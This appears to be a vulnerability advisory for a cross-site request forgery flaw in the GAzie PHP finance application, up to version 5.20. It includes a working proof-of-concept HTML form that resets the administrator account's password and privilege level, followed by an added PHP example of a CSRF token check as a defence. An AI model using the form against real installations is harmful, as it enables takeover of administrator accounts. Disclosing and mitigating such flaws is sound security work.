Title: GAzie <= 5.20 Cross Site Request Forgery
========================================
Author: giudinvx <giudinvx[at]gmail[dot]com>
Site: http://www.giudinvx.altervista.org/
--------------------------------------------------------
@Program info:
Multicompany finance application written in PHP using a MySQL database backend for small to medium enterprise. It lets you write invoices, manage stock, manage orders, accounting, etc. Send tax receipt to electronic cash register.
@Version 5.20
http://sourceforge.net/projects/gazie/
--------------------------------------------------------
==============[[ -Test code- ]]==============
<form enctype="multipart/form-data" action="[host]/modules/config/admin_utente.php?Login=amministratore&Update" method="POST">
  <input type="hidden" name="Login" value="amministratore">
  <input type="hidden" value="" name="Update">
  <input type="text" value="Surname " name="Cognome" title="Cognome">
  <input type="text" value="Name " name="Nome" title="Nome">
  <input type="text" value="italian" name="lang">
  <input type="text" value="9" name="Abilit"><br/>
  Password <input type="password" value="" name="Password"><br/><!-- at least eight alphanumeric characters -->
  Repeat password <input type="password" value="" name="confpass"><br/>
  <input type="submit" value="START THE GAME" name="Submit">
</form>
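The form above is accepted because nothing in the request ties it to a page the application itself served. The following is an added example, not GAzie code and not from the advisory author: a per-session CSRF token check that a state-changing handler could run before processing such a POST. The function names and the `csrf_token` field name are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example (not GAzie code): per-session CSRF token for a state-changing
// form such as the user-update POST shown above. All names are hypothetical.

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every form that changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/** True only for a POST that carries the token bound to this session. */
function csrf_request_is_valid(string $method, array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($expected) && $expected !== ''
        && is_string($supplied)
        && hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed demonstration data: the first request has the fields of the
// cross-site form but no token; the second also carries the session's token.
if (PHP_SAPI === 'cli') {
    $session   = ['csrf_token' => bin2hex(random_bytes(32))];
    $crossSite = ['Login' => 'amministratore', 'Update' => '', 'Abilit' => '9'];
    $sameSite  = $crossSite + ['csrf_token' => $session['csrf_token']];
    var_dump(csrf_request_is_valid('POST', $crossSite, $session));
    var_dump(csrf_request_is_valid('POST', $sameSite, $session));
}
```

In a real handler the check runs after `session_start()` and before any field of the request is acted on, and a failed check ends the request without changing the account.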